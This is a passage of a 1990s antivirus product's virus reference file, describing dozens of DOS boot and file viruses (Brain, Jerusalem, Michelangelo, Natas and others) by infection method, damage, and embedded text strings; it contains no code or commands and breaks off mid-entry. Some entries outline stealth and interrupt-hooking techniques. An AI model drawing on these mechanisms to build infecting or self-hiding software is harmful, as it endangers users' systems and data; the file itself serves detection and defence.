home *** CD-ROM | disk | FTP | other *** search
/ CD Pro / CD Pro.iso / Pcscan / English / DATA.3 / COMMON.VIR < prev    next >
Text File  |  1997-10-29  |  1MB  |  31,362 lines

  1. [(c)Brain]
  2. Virus Name: (c)Brain
  3. Alias Name: Pakistani, Clone, Nipper
  4. Virus Type: Boot Virus
  5. Virus Length: N/A
  6. Description: This virus infects boot sectors.
  7.  
  8. When an infected file is executed, the virus installs itself into
  9. memory. Total available memory will decrease by 3-7 Kbytes.
  10.  
  11. This virus moves the boot sector and replaces it with a copy of
  12. the virus. The original boot sector will be moved to another
  13. sector and marked as bad. This virus will also change the disk
  14. label to read:
  15.  
  16.     "(c) Brain"
  17.  
  18. The following text is located in the virus:
  19.  
  20.     Welcome to the Dungeon
  21.     (c) 1986 Basit & Amjad (pvt) Ltd.
  22.     BRAIN COMPUTER SERVICES
  23.     730 NIZAB BLOCK ALLAMA IQBAL TOWN
  24.     LAHORE-PAKISTAN
  25.     PHONE :430791,443248,280530.
  26.     Beware of this VIRUS....
  27.     Contact us for vaccination.................
  28.     $#@%$@!!
  29.  
  30. [555]
  31. Virus Name: 555
  32. Alias Name: Dutch 555, Quit-199
  33. Virus Type: File Virus
  34. Virus Length: 555 bytes
  35. Description: This virus infects *.COM and *.EXE files, as well
  36.                     as COMMAND.COM.
  37.  
  38. When an infected file is executed, the virus installs itself into
  39. memory. Total available memory will decrease by 560 bytes.
  40.  
  41. Once the virus is memory resident, it will infect *.COM and *.EXE
  42. files as they are executed. Infected files will increase in size
  43. by 555 bytes, with the virus being located at the end of the
  44. infected file. Infected files will have their date and time records
  45. updated to the date and time the infection occurred.
  46.  
  47. [AirCop]
  48. Virus Name: AirCop
  49. Alias Name:
  50. Virus Type: Boot Virus
  51. Virus Length: N/A
  52. Description: This virus infects boot sectors.
  53.  
  54. When a system is booted from a disk infected by the virus, the
  55. virus will install itself memory resident.  Total system memory
  56. will decrease by 1,024 bytes.
  57.  
  58. Once the virus is memory resident, all unprotected diskettes accessed
  59. will be infected.  The virus will replace the floppy boot sector
  60. with a copy of itself.
  61.  
  62. The virus will show the following message on infected systems:
  63.  
  64.      "Red State, Germ Offensive.
  65.       AIRCOP."
  66.  
  67. [Alameda]
  68. Virus Name: Alameda
  69. Alias Name: Alemeda
  70. Virus Type: Boot Virus
  71. Virus Length: N/A
  72. Description: This virus infects boot sectors.
  73.  
  74. When the system is booted from a disk infected by the virus, the
  75. virus will install itself memory resident.
  76.  
  77. Once the virus is memory resident, all unprotected 5-1/4" 360k
  78. diskettes will be infected when it activates through a warm boot
  79. (CTRL-ALT-DEL). (The virus remains in memory after a warm boot).
  80.  
  81. [Ambulance]
  82. Virus Name: Ambulance
  83. Alias Name: Ambulance Car, RedX
  84. Virus Type: File Virus
  85. Virus Length: 796 bytes
  86. Description: This virus infects *.COM files.
  87.  
  88. When an infected file is executed, the virus will attempt to infect
  89. one *.COM file.
  90.  
  91. Other symptoms include displaying a moving ambulance at the bottom
  92. of the screen as well as playing the sound of a siren.
  93.  
  94. [AntiEXE]
  95. Virus Name: AntiEXE
  96. Alias Name: D3, NewBug, CMOS4
  97. Virus Type: Boot Virus
  98. Virus Length: N/A
  99. Description: This virus infects boot sectors.
  100.  
  101. When the system is booted from a disk infected by the virus, the
  102. virus will install itself memory resident. Total available memory
  103. will decrease by 1,024 bytes.  The virus will also overwrite the
  104. Master Boot Sector with a copy of the virus.
  105.  
  106. Once the virus is memory resident, it will infect all unprotected
  107. diskettes.
  108.  
  109. [Atomic]
  110. Virus Name: Atomic
  111. Alias Name:
  112. Virus Type: File Virus
  113. Virus Length: 371 bytes
  114. Description: This virus infects *.COM files.
  115.  
  116. When an infected file is executed, the virus will infect the first
  117. two *.COM files located in the same directory. The virus will
  118. permanently overwrite the first 371 bytes of the files it infects.
  119. Date and time fields of infected files will not be altered. The
  120. virus will show the following message after infecting a file:
  121.  
  122.     "Bad command or file name"
  123.  
  124. The following text string is located in the virus:
  125.  
  126.     "[TAD1A] Memory Lapse -- Toronto, CANADA"
  127.     "The Atomic Dustbin 1A -- This is just the first
  128.     step"
  129.     "Bad command or file name"
  130.     "*.COM .. c Dustbin 1A -- This is just the first
  131.     step"
  132.  
  133. [Austr_Parasite]
  134. Virus Name: Austr_Parasite
  135. Alias Name: Aussie Parasite
  136. Virus Type: File Virus
  137. Virus Length: 292 bytes
  138. Description: This virus infects *.COM files as well as COMMAND.COM.
  139.  
  140. When an infected file is executed, the virus will install itself
  141. into memory. Total available memory will decrease by 320 bytes.
  142.  
  143. Once the virus is memory resident, all executing *.COM files will
  144. be infected. Infected files will increase in size by 292 bytes,
  145. with the virus being located at the end of the infected file.
  146. Date and time records of infected files will not be altered.
  147.  
  148. Symptoms include system hanging.
  149.  
  150. The following text string is visible in the virus:
  151.  
  152.     "Australian Parasite"
  153.  
  154. [Bljec]
  155. Virus Name: Bljec
  156. Alias Name: Black Jec
  157. Virus Type: File Virus
  158. Virus Length: 231-440 bytes
  159. Description: This virus infects *.COM files.
  160.  
  161. When an infected file is executed, the virus will infect three *.COM
  162. programs in the same directory. Infected files will increase in
  163. size by 231-440 bytes, with the virus being located at the beginning
  164. of the infected file. Infected files will have their date and time
  165. records updated to the date and time the infection occurred.
  166.  
  167. Symptoms include system hanging.
  168.  
  169. [Butterfly]
  170. Virus Name: Butterfly
  171. Alias Name: Butterflies
  172. Virus Type: File Virus
  173. Virus Length: 302 bytes
  174. Description: This virus infects *.COM files.
  175.  
  176. When an infected file is executed, the virus will infect all the
  177. *.COM files located in the same directory.
  178.  
  179. Infected files will increase in size by 302 bytes, with the virus
  180. being located at the end of the infected file. Infected files will
  181. not have their date and time records altered.
  182.  
  183. The following text string is located in the virus:
  184.  
  185.     "Goddamn Butterflies"
  186.     "*.COM"
  187.  
  188. [Cascade]
  189. Virus Name: Cascade
  190. Alias Name: Black Jack, Falling
  191. Virus Type: File Virus
  192. Virus Length: 1,701 or 1,704 bytes
  193. Description: This virus infects *.COM files.
  194.  
  195. When an infected file is executed, the virus installs itself into
  196. memory.
  197.  
  198. Once the virus is memory resident, it will cause the characters on
  199. the screen to fall to the bottom of the screen.
  200.  
  201. [Connie]
  202. Virus Name: Connie
  203. Alias Name:
  204. Virus Type: File Virus
  205. Virus Length: 1,761 bytes
  206. Description: This virus infects *.COM files, as well as COMMAND.COM.
  207.  
  208. When an infected file is executed, the virus installs itself into
  209. memory. Total available memory will decrease by 3,520 bytes.
  210.  
  211. Once the virus is memory resident, it will infect *.COM files when
  212. they are executed, opened, or copied. Infected files will increase
  213. in size by 1,761 bytes, with the virus being located at the
  214. end of the infected file. The date and time information of infected
  215. files will not be altered.
  216.  
  217. The following text string can be found in the virus:
  218.  
  219.     "This is <Connie> Written by Dark Slayer in
  220.     Keelung TAIWAN P:\COMMAND.COM"
  221.  
  222. [CVirus]
  223. Virus Name: CVirus
  224. Alias Name: Nowhere Man, VMessi
  225. Virus Type: File Virus
  226. Virus Length:
  227. Description: This virus infects *.COM  and *.EXE files that are
  228.                     larger than 6,300 bytes in size.
  229.  
  230. When an infected file is executed, the virus will search for a
  231. suitable file to infect (larger than 6,300 bytes in size). Infected
  232. files will have the first original 6,286 bytes overwritten by the
  233. virus. Date and time information of infected files will not be
  234. altered. Once a file is successfully infected, the following message
  235. will be displayed on the screen:
  236.  
  237.     "Out of memory"
  238.  
  239. If infection is not possible, the following message will be displayed:
  240.  
  241.     "All files infected.  Mission complete."
  242.  
  243. The following text string can be found in the virus:
  244.  
  245.     "NMAN"
  246.     "BMAN"
  247.     "*.EXE"
  248.  
  249. [DataLock]
  250. Virus Name: DataLock
  251. Alias Name: Datalock.920.A, V920
  252. Virus Type: File Virus
  253. Virus Length: 920 bytes
  254. Description: This virus infects *.COM and *.EXE files.
  255. PC Vectors Hooked: INT 21h
  256.  
  257. Infection method: When an infected file runs, the virus loads itself
  258. into memory. While loaded, it infects any file that executes.
  259. Infected files increase by 920 bytes.
  260.  
  261. Damage: After August 1990, the virus won't allow files with the
  262. extension .?BF to be opened. When an attempt is made, it displays
  263. the erroneous error message "Too many files open."
  264.  
  265. [Denzuko]
  266. Virus Name: Denzuko
  267. Alias Name: Den Zuk
  268. Virus Type: Boot Virus
  269. Virus Length: N/A
  270. Description: This virus infects boot sectors.
  271.  
  272. Infection method: When the system attempts to boot from an infected
  273. diskette, the virus loads itself into memory--even if the boot fails.
  274. While loaded, the virus attempts to infect any accessed diskette.
  275.  
  276. Damage: When <Ctrl><Alt><Del> is pressed, the message "Den Zuk" is
  277. displayed and the system seems to reboot. However, the virus remains
  278. in memory. Because the virus was designed for 360 KB diskettes,
  279. it unintentionally destroys data on 3.5 inch or 1.2 MB diskettes.
  280.  
  281. [Die_Hard_2]
  282. Virus Name: Die_Hard_2
  283. Alias Name: DH2
  284. Virus Type: File Virus
  285. Virus Length: 4,000 bytes
  286. Description: This virus infects *.COM and *.EXE files.
  287. Interrupt vectors hooked: INT 21h
  288.  
  289. Infection method: When an infected file runs, the virus loads itself
  290. into memory. While loaded, it infects accessed executable files.
  291. Infected files increase by 4,000 bytes.
  292.  
  293. Damage: Under analysis
  294.  
  295. [Dir]
  296. Virus Name: Dir
  297. Alias Name: DIR
  298. Virus Type: File Virus
  299. Virus Length: 691 bytes
  300. Description: See Dir-2
  301.  
  302. [Dir-2]
  303. Virus Name: Dir-2
  304. Alias Name: Dir-II, Creeping Death
  305. Virus Type: File Virus
  306. Virus Length: 1,024 bytes
  307. Description: This virus infects *.COM and *.EXE files.
  308. PC Vectors Hooked: None
  309.  
  310. Execution Procedure:
  311. 1) When the virus loads itself resident in memory it will change
  312.     the directory structure data so that certain executable files
  313.     are linked to itself.
  314. 2) This allows the virus to execute when you execute a file to which
  315.     the DIR2-910 virus is linked to. At this point it can begin to
  316.     infect other files.
  317. 3) The virus stays resident in memory but doesn't hook any interrupts.
  318.     It uses another function to infect files. It infects .COM and
  319.     .EXE files when they are "READ & WRITE".
  320.  
  321. Damage: When all the .COM and .EXE files are infected on a disk, it
  322. will not be possible to execute any files from the disk.
  323.  
  324. Detection Method: Check the disk by using "CHKDSK.EXE"; if some files
  325. are cross-linked to the same position, then these files must be
  326. infected.
  327.  
  328. Note: DIR2-910 doesn't hook INT 24h when infecting files. It omits
  329. I/O errors (such as write protect).
  330.  
  331. [Disk_Killer]
  332. Virus Name: Disk_Killer
  333. Alias Name: Ogre
  334. Virus Type: Boot Virus
  335. Virus Length: N/A
  336. Description: This virus infects boot sectors.
  337.  
  338. Infection method: When the system is booted from an infected disk,
  339. the virus loads itself into memory.
  340.  
  341. Damage: After the computer has been on for 48 hours, the virus
  342. displays the following message and then encrypts all the data on
  343. the hard disk:
  344.  
  345. "Disk Killer -- Version 1.00 by COMPUTER OGRE
  346.  04/01/1989
  347.  
  348.  Warning!!
  349.  Don't turn off the power or
  350.  remove the diskette while Disk Killer is Processing.
  351.  Processing.
  352.  Now you can turn off the power. I wish you luck."
  353.  
  354. [EDV]
  355. Virus Name: EDV
  356. Alias Name: Cursy
  357. Virus Type: Boot Virus
  358. Virus Length: N/A
  359. Description: This virus infects boot sectors.
  360.  
  361. When the system is booted from a disk infected by the virus, the
  362. virus will install itself into memory.
  363.  
  364. Once the virus is memory resident, it will infect any accessed floppy
  365. disks. It will move the original boot sector, replacing it with a
  366. copy of the virus.
  367.  
  368. Once the virus has infected six disks, it will disable the keyboard
  369. as well as corrupt all disks in the system.  Once completed, the
  370. following message will be displayed on the screen:
  371.  
  372.     "That rings a bell, no?  From Cursy"
  373.  
  374. The following string can be found in infected boot sectors:
  375.  
  376.     "MSDOS Vers. E.D.V."
  377.  
  378. [Exebug]
  379. Virus Name: Exebug
  380. Alias Name: Swiss Boot, CMOS killer
  381. Virus Type: Boot Virus
  382. Virus Length: N/A
  383. Description: This virus infects boot sectors.
  384. PC Vectors Hooked: INT 13h
  385.  
  386. Infection method: When the system is booted from an Exebug infected
  387. diskette, the Exebug virus will install itself memory resident at
  388. the top of system memory but below the 640K DOS boundary,
  389. moving interrupt 12's return.  Total system and available free
  390. memory will decrease by 1,024 bytes.  Also at this time, the virus
  391. will infect the system hard disk's master boot sector.
  392.  
  393. Damage: Master boot sector corruption; decrease in total system
  394. and available free memory; inability to access drive C: after diskette
  395. boot.
  396.  
  397. [Fat_Table]
  398. Virus Name: Fat_Table
  399. Alias Name:
  400. Virus Type: File Virus
  401. Virus Length: 6,540 bytes
  402. Description: This virus infects *.EXE  files.
  403.  
  404. When an infected file is executed, the virus will infect one *.EXE
  405. file located in the same directory.  The virus will overwrite the
  406. first 6,540 bytes of the original file. Date and time information of
  407. infected files will be updated to the time of infection.
  408.  
  409. The following text string can be found in the virus:
  410.  
  411.     "hitohana"
  412.     "karu ba"
  413.     "rb C:\ * .* FAT TABLE E"
  414.     "8RROR"
  415.     "EXE"
  416.     "COM"
  417.  
  418. [Filler.A]
  419. Virus Name: Filler.A
  420. Alias Name: Filler
  421. Virus Type:   Boot Virus
  422. Virus Length: N/A
  423. Description: This virus infects boot sectors.
  424.  
  425. Infection method: When the system is booted from an infected floppy,
  426. the virus loads itself into memory. While loaded, it infects any
  427. accessed, non-protected disks. The DOS CHKDSK program will
  428. show a "total bytes memory" decrease of 8,192 bytes.
  429.  
  430. Damage: Under analysis
  431.  
  432. [Flip]
  433. Virus Name: Flip
  434. Alias Name:
  435. Virus Type:   Boot Virus
  436. Virus Length: 2,672 bytes
  437. Description: This virus infects *.COM and *.EXE files.
  438. PC Vectors Hooked: INT 21h
  439.  
  440. Infection Process: This virus spreads by executing an infected
  441. program or by booting the system with an infected disk. There are
  442. several methods of infection.
  443.  
  444. 1) Infection of a clean system by an infected program.
  445.  
  446. When an infected program is executed in a clean system, the virus
  447. will copy itself in the last side of the last cylinder, beginning
  448. from the 5th last sector to the 1st last sector and the virus
  449. will subtract the DOS boot sector at offset 0x13h (Number of logical
  450. sectors) with 6. Finally, the virus code is written onto the partition
  451. sector.
  452.  
  453. 2) Spreading the infection through an infected disk.
  454.  
  455. If a PC is booted from an infected disk, the spreading of the infection
  456. is complete.  The boot code, previously overwritten by the virus on the
  457. disk partition sector, reads the main core of the virus from the last
  458. 5 sectors to the last sector, and loads it as a TSR in RAM, occupying
  459. 3 Kb of the higher part of system memory.  As soon as it is installed
  460. as a TSR, the virus takes control of Int 1Ch (Timer Interrupt) to
  461. verify, with a frequency of 18.2 times per second, if the DOS
  462. COMMAND.COM is loaded.  If DOS is present, the virus restores the
  463. timer and takes control of Int 21h.
  464.  
  465. Damage: Loss of data stored in the 6th last to 1st last sectors of the
  466. disk. Virus also increases file sizes.
  467.  
  468. Symptoms: Virus turns screen display upside down (rotates 180 degrees).
  469. File sizes increase by 2,153 bytes.
  470.  
  471. Note: The virus uses a smart technique to avoid anti-virus detection
  472. programs, when modifying the partition sector, that is hooking int
  473. 01h, it will turn on a single step flag to get the original
  474. entry of DOS hooked of INT 13h . The virus will then move itself to
  475. the top of the MCB (memory control block), and decrease available
  476. memory in the MCB by 2672 (A70h) bytes. It will hook Int 21h
  477. with the same method as for INT 13h and then proceeds to run the
  478. original program.
  479.  
  480. [Form.A]
  481. Virus Name: Form.A
  482. Alias Name: FORM, Form, Form 18, Generic
  483. Virus Type: Boot Virus
  484. Virus Length: N/A
  485. Description: This virus infects boot sectors.
  486. PC Vectors Hooked: INT 13h, INT 09h
  487.  
  488. Infection method: When the system is booted from an infected diskette,
  489. the virus infects the DOS boot sector and loads itself into memory.
  490. While loaded, it infects any accessed, non-protected disks. The DOS
  491. CHKDSK program will indicate 653,312 bytes of free memory.
  492.  
  493. Damage: On the 18th day of any month, the virus will emit a clicking
  494. sound whenever keys are pressed. The system may hang when a read
  495. error occurs, and parts of the original boot sector may be
  496. overwritten, making the partition unbootable.
  497.  
  498. [Friday_13th]
  499. Virus Name: Friday_13th
  500. Alias Name: Friday the 13th, Virus 1813, Israelian, Jerusalem
  501. Virus Type: File Virus
  502. Virus Length: approx. 1,813 bytes
  503. Description: This virus infects *.COM and *.EXE files.
  504. PC Vectors Hooked:  Int 21
  505.  
  506. Execution Procedure:
  507. 1) The virus checks whether it is already loaded resident in memory.
  508.     If "No", it then loads itself resident into memory by hooking INT
  509.     21h.
  510. 2) It then executes the original file.
  511. 3) With itself loaded resident in memory it will infect any uninfected
  512.     file that is executed.
  513.  
  514. Damage: In the year 1987, the virus does no damage. It proceeds only
  515. to infect other files. Every Friday the 13th, excluding the year 1987,
  516. the virus deletes every executed program . All other days, excluding
  517. the year 1987, the virus spreads.  About half an hour after the virus
  518. is installed in memory it scrolls up by two lines a small window
  519. with coordinates (5, 5), (16, 16) and slows down computer speed.
  520. Delay loop repeats 18.5 times per second.
  521.  
  522. Detection Method: Increases the file length by 1813 bytes.
  523.  
  524. Note: Loads itself resident in memory.  An error message appears if
  525. there is an I/O error (such as write protect).
  526.  
  527. [Frodo.Frodo.A]
  528. Virus Name: Frodo.Frodo.A
  529. Alias Name: 4096, IDF, 4096-1, Frodo, Frodo.Frodo.A, 100 Year
  530. Virus Type: File Virus
  531. Virus Length: 4,096 bytes
  532. Description: This virus infects *.COM and *.EXE files.
  533. PC Vectors Hooked: INT 21h, INT 13h
  534.  
  535. Infection method: When an infected file runs, the virus loads itself
  536. in memory. While loaded, it infects accessed executable files. The
  537. virus increases the size of infected files by 4096 bytes.
  538.  
  539. Damage: After September 21, the virus tries to modify the boot sector
  540. to display "FRODO LIVES." However, the virus code is corrupted, so
  541. instead of modifying the system areas, it crashes the system.
  542.  
  543. Note: While the virus is in memory, it hides the increase in infected
  544. file sizes.
  545.  
  546. [Generic_408]
  547. Virus Name: Generic_408
  548. Alias Name: NYB, B1
  549. Virus Type: Boot Virus
  550. Virus Length: N/A
  551. Description: This virus infects boot sectors.
  552.  
  553. Infection method: When the system is booted from an infected diskette,
  554. the virus infects the master boot record and loads itself in memory.
  555. While loaded, it infects any accessed, non-protected disks.
  556.  
  557. Damage: None known
  558.  
  559. [Generic_437]
  560. Virus Name: Generic_437
  561. Alias Name: Boot-437
  562. Virus Type: Boot Virus
  563. Virus Length: N/A
  564. Description: This virus infects boot sectors.
  565.  
  566. This virus will only infect hard drives when an attempt to boot
  567. from an infected diskette is made. Once the virus has infected
  568. the hard drive, all non-protected floppies used in the machine will
  569. be infected.
  570.  
  571. Unlike most other boot sector viruses (except Form), Boot-437
  572. infects the DOS boot sector on hard drives instead of the Master
  573. Boot Record.
  574.  
  575. [GreenCat]
  576. Virus Name: GreenCat
  577. Alias Name: Green Caterpillar, Green_Caterpillar.1575.A, Find, 1591,
  578.                    1575
  579. Virus Type: File Virus
  580. Virus Length: 1,991 to 2,005 bytes
  581. Description: This virus infects *.COM and *.EXE files.
  582. PC Vectors Hooked: INT 21h
  583.  
  584. Infection method: When an infected file runs, the virus loads itself
  585. in memory.
  586.  
  587. Damage: After a specific time period has elapsed, the execution of
  588. an infected file causes a green caterpillar to run across the screen,
  589. excreting the screen contents as it goes. There is no permanent
  590. damage.
  591.  
  592. [Grog31]
  593. Virus Name: Grog31
  594. Alias Name: Grog 3.1
  595. Virus Type: File Virus
  596. Virus Length: 1,200 bytes
  597. Description: This virus infects *.COM files as well as COMMAND.COM.
  598.  
  599. When an infected file is executed, the virus installs itself into
  600. memory. Total available memory will decrease by 4,800 bytes. The
  601. virus will also infect COMMAND.COM.
  602.  
  603. Once the virus is memory resident, it will infect *.COM files
  604. that are larger than 2,000 bytes when they are executed or opened.
  605. Infected files will increase in size by 1,200 bytes, with the virus
  606. being located at the beginning of the infected file. Date and time
  607. information of infected files will not be altered.
  608.  
  609. The following text string can be found in the virus:
  610.  
  611.     "GROG 4EVER!"
  612.     "GROG v3.1 (C) '93 by GROG - Italy"
  613.     "Microsoft C:\COMMAND.COM"
  614.  
  615. [Hacktic2]
  616. Virus Name: Hacktic2
  617. Alias Name:
  618. Virus Type: File Virus
  619. Virus Length: 83 bytes
  620. Description: Infects *.COM and *.EXE files, including COMMAND.COM.
  621.  
  622. When an infected file is executed, the virus will infect one file
  623. in the current directory, truncating the file size to 83 bytes as
  624. well as changing the file attribute to "hidden."  The date and time
  625. information of infected files will be updated to the time of infection.
  626.  
  627. [Hobbit]
  628. Virus Name: Hobbit
  629. Alias Name:
  630. Virus Type: File Virus
  631. Virus Length: 505 bytes
  632. Description: This virus infects *.EXE files.
  633.  
  634. When an infected file is executed, the virus installs itself into
  635. memory. Total available memory will decrease by 1,440 bytes.
  636.  
  637. Once the virus is memory resident, it will infect *.EXE when they
  638. are executed or opened.  The virus will overwrite the first 505
  639. bytes of the file. Date and time information of infected files will
  640. not be altered.
  641.  
  642. The following text string can be found in the virus:
  643.  
  644.     "HOBIT"
  645.  
  646. [Jerusalem]
  647. Virus Name: Jerusalem
  648. Alias Name: Israeli, Jerusalem.1808.Standard, 1808, Israeli,
  649.                    1813 Jeru-3-3, Jerusalem.1808.Critical.
  650. Virus Type: File Virus
  651. Virus Length: 1,808 to 1,822 bytes
  652. Description: This virus infects *.COM and *.EXE files.
  653. PC Vectors Hooked: INT 21h, INT 08h
  654.  
  655. Infection method: When an infected file runs, the virus loads itself
  656. in memory. While loaded, it infects any file that executes, except the
  657. COMMAND.COM file. The virus increases the size of .EXE files by
  658. 1,808-1,822 on the first infection and 1,808 bytes with each
  659. reinfection. Infected .COM files increase by 1,813 bytes.
  660.  
  661. Damage: On Friday the 13th, after the virus has been resident for 30
  662. minutes, it deletes files that are executed. On other days, the virus
  663. slows down the system 30 minutes after each infection. It also wipes
  664. out an area of the screen, though nothing is displayed. A bug in the
  665. virus can cause .EXE file to be infected repeatedly until they
  666. become too large to execute.
  667.  
  668. [Joshi]
  669. Virus Name: Joshi
  670. Alias Name: Happy Birthday Joshi
  671. Virus Type: Boot Virus
  672. Virus Length: N/A
  673. Description: This virus infects boot sectors.
  674.  
  675. Detection Method: The first "Joshi" virus was detected in India in June
  676. 1990. It is a very popular virus in India.  Virus remains resident in
  677. the boot sector or in FAT area. Every January 5, the virus displays:
  678. "Type Happy Birthday Joshi." All will return to normal if the user
  679. types the above message. System memory decreases by 6KB when virus
  680. is resident.
  681.  
  682. Note: Loads itself resident in memory. An error message appears if
  683. there is an I/O error (such as write protect).
  684.  
  685. [Jumper]
  686. Virus Name: Jumper
  687. Alias Name: 2kb
  688. Virus Type:   File Virus
  689. Virus Length: 2,048 bytes
  690. Description: This virus infects *.COM and *.EXE files and COMMAND.COM.
  691.  
  692. When an infected file is first executed in a clean system, the
  693. virus will load itself into memory. Total memory will decrease by
  694. 8,336 bytes. Once the virus is memory resident, it will infect
  695. *.COM and *.EXE files as they are executed. Infected files will have
  696. a file length increase of 2,048 bytes. The date and time information of
  697. infected files will not be altered.
  698.  
  699. The following text string is located in infected programs:
  700.  
  701.      "BIOS"
  702.  
  703. [Junkie.A-1]
  704. Virus Name: Junkie.A-1
  705. Alias Name: Junkie
  706. Virus Type: File Virus
  707. Virus Length: N/A
  708. Description: This virus infects *.COM and *.EXE files.
  709. PC Vectors Hooked: INT 1Ch, INT 21h
  710.  
  711. Infection method: The first time an infected file runs, the virus
  712. overwrites the hard disk's master boot record. When the system is
  713. booted again (or when it is booted from an infected diskette), the
  714. virus loads itself in memory. While loaded, the virus infects any
  715. .COM file that executes and any accessed diskettes. The DOS CHKDSK
  716. program will show a "total bytes memory" decrease of 3,072 bytes.
  717. Infected files increase by just over 1,000 bytes.
  718.  
  719. Damage: None known
  720.  
  721. [K_Hate]
  722. Virus Name: K_Hate
  723. Alias Name: K-Hate
  724. Virus Type: File Virus
  725. Virus Length: 1,237 to 1,304 bytes
  726. Description: This virus infects *.COM files including COMMAND.COM.
  727.  
  728. When an infected file is executed, the virus will infect all *.COM
  729. files in the same directory. Infected files will experience a file
  730. length increase of 1,237 to 1,304 bytes with the virus being located at
  731. the end of the file.  Date and time information of infected files will
  732. not be altered.
  733.  
  734. The following text string can be found in the virus:
  735.  
  736.     "CRYPT INFO"
  737.     "KDG 0,5 / Khntark3"
  738.     "*, K-HATE / Khntark*.COM"
  739.  
  740. [Kampana.A]
  741. Virus Name: Kampana.A
  742. Alias Name: Telecom Boot, Campa, Anti-Tel, Brasil
  743. Virus Type: Boot Virus
  744. Virus Length: N/A
  745. Description: This virus infects boot sectors.
  746. PC Vectors Hooked: INT 13h
  747.  
  748. Infection method: When the system is booted from an infected diskette,
  749. the virus loads itself in memory. While loaded, it infects any accessed
  750. disks. The DOS CHKDSK program will show a "total bytes memory" decrease
  751. of 1,024 bytes.
  752.  
  753. Damage: After a number of reboots, the virus overwrites sectors of the
  754. hard disk.
  755.  
  756. Note: If you attempt to examine the master boot record while the virus
  757. is loaded, it will display the original, uninfected version.
  758.  
  759. [KeyKapture]
  760. Virus Name: KeyKapture
  761. Alias Name: KeyKap, Hellspawn.1
  762. Virus Type: File Virus
  763. Virus Length: 1,074 bytes
  764. Description: Infects *.EXE files by creating a hidden *.COM file of the
  765.                     same name in the same directory.
  766.  
  767. When an infected file is executed, the virus installs itself into
  768. memory. Total available memory will decrease by 3,072 bytes.
  769.  
  770. Once the virus is memory resident, it will infect *.EXE when they are
  771. executed by creating a 1,074 byte *.COM file of the same name. The
  772. original *.EXE file will not be changed in any way. Infected systems
  773. may experience system hangs.
  774.  
  775. The following text string can be found in the virus:
  776.  
  777.     "KKV.90 KeyKapture Virus v0.90 [Hellspawn-II]
  778.      (c) 1994 by Stormbringer [PS]"
  779.  
  780. [MacGyver]
  781. Virus Name: MacGyver
  782. Alias Name:
  783. Virus Type: File Virus
  784. Virus Length: 2,824 bytes
  785. Description: This virus infects *.EXE files.
  786.  
  787. Infection method:  When the infected program is executed, the MacGyver
  788. virus will install itself memory resident as a low system memory TSR
  789. of 3,072 bytes. When the MacGyver virus is memory resident, it will
  790. infect .EXE programs when they are executed or opened.  The following
  791. text string is visible within the MacGyver viral code in all infected
  792. programs:
  793.  
  794.     "SCANVIR.SHW"
  795.  
  796. Damage: It may cause frequent system hangs when .EXE programs are
  797. executed. The DOS CHKDSK program will indicate file allocation errors
  798. on all infected files when the virus is memory resident.
  799.  
  800. [Metal_Militia]
  801. Virus Name: Metal_Militia
  802. Alias Name: MMIR, Immortal Riot
  803. Virus Type: File Virus
  804. Virus Length: 282 bytes
  805. Description: This virus infects *.COM  files, as well as COMMAND.COM.
  806.  
  807. When an infected file is executed, the virus installs itself into
  808. memory. Total available memory will decrease by 3,072 bytes.
  809.  
  810. Once the virus is memory resident, it will infect *.COM files when
  811. they are executed.  Infected files will increase in size by 1,054-5
  812. bytes, with the virus being located at the beginning of the infected
  813. file. Date and time information of infected files will not be altered.
  814.  
  815. The following text string can be found in the virus:
  816.  
  817.   "Senseless Destruction..."
  818.   "Protecting what we are joining together to take
  819.    on the world.."
  820.   "METAL MiLiTiA [iMMORTAL RIOT] SVW"
  821.  
  822. [Michelangelo]
  823. Virus Name: Michelangelo
  824. Alias Name:
  825. Virus Type: Boot Virus
  826. Virus Length: N/A
  827. Description: This virus infects disk boot sectors.
  828.  
  829. When the system is booted from a disk infected with the Michelangelo
  830. virus, the virus will install itself into memory. Total available
  831. memory will decrease by 2,048 bytes.
  832.  
  833. Once the virus is memory resident, it will infect diskette boot sectors
  834. on access.  The virus will move the original boot sector and replace
  835. it with a copy of the virus.
  836.  
  837. This virus activates on March 6.  It will format the hard disk,
  838. overwriting all existing data.
  839.  
  840. [Monkey]
  841. Virus Name: Monkey
  842. Alias Name: Stoned.Empire.Monkey.B, Monkey 2
  843. Virus Type: Boot Virus
  844. Virus Length: N/A
  845. Description: This virus infects boot sectors.
  846.  
  847. Infection method: When the system is booted with an infected diskette,
  848. the virus loads itself in memory. While loaded, it infects any
  849. accessed, non-protected disks. The DOS CHKDSK program will show a
  850. "total bytes memory" decrease of 1,024 bytes. Monkey-1 is one of the
  851. few viruses that can successfully infect floppies while Microsoft
  852. Windows is running.
  853.  
  854. Damage: The virus encrypts the partition table of the master boot
  855. record. If you attempt to boot from a clean floppy, the disk will
  856. be inaccessible because the partition table has been moved.
  857.  
  858. Note: If you attempt to examine the master boot record while the
  859. virus is in memory, it will display the original, uninfected version.
  860.  
  861. Caution: Do not use FDISK /MBR to clean this virus.
  862.  
  863. [Mummy]
  864. Virus Name: Mummy
  865. Alias Name:
  866. Virus Type: File Virus
  867. Virus Length: 1,300 - 1,503 bytes
  868. Description: This virus infects *.EXE files.
  869.  
  870. Execution Procedure:
  871. 1) The virus checks whether it is already loaded resident in memory.
  872.     If "No", it then loads itself resident into memory by hooking
  873.     INT 21h.
  874. 2) It then executes the original file.
  875. 3) With itself loaded resident in memory it will infect any uninfected
  876.     file that is executed.
  877.  
  878. Damage: This virus has several variants. While some variants have no
  879. damage routine, some will slow down the system performance and variants
  880. of the Mummy virus will have a Random Number counter. When the counter
  881. reaches zero, the virus will overwrite the first part of the hard disk
  882. and cause severe data loss.
  883.  
  884. Detection Method: Increases infected file size by 1,300-1,503 bytes.
  885. Virus occasionally hangs the system when the virus is resident in
  886. memory. Encrypted text strings inside the virus code:
  887.  
  888.     "Mummy Version x.xxx",
  889.     "Kaohsiung Senior School",
  890.     "Tzeng Jau Ming presents",
  891.     "Series Number=[xxxxx]."
  892.  
  893. Note: Loads itself resident in memory. An error message appears if
  894. there is an I/O error (such as write protect).
  895.  
  896. [Natas]
  897. Virus Name: Natas
  898. Alias Name: Satan, Sat_Bug.Natas, Natas-4, Natas-6
  899. Virus Type: File Virus
  900. Virus Length: 4,746 bytes
  901. Description: This virus infects *.COM and *.EXE files.
  902. PC Vectors Hooked: INT 13h, INT 21h
  903.  
  904. Infection method: When the system is booted with an infected disk,
  905. the virus loads itself in memory and infects the master boot record.
  906. While loaded, it infects any accessed executable files or diskettes.
  907. Total system memory decreases by 5,664 bytes. Infected files increase
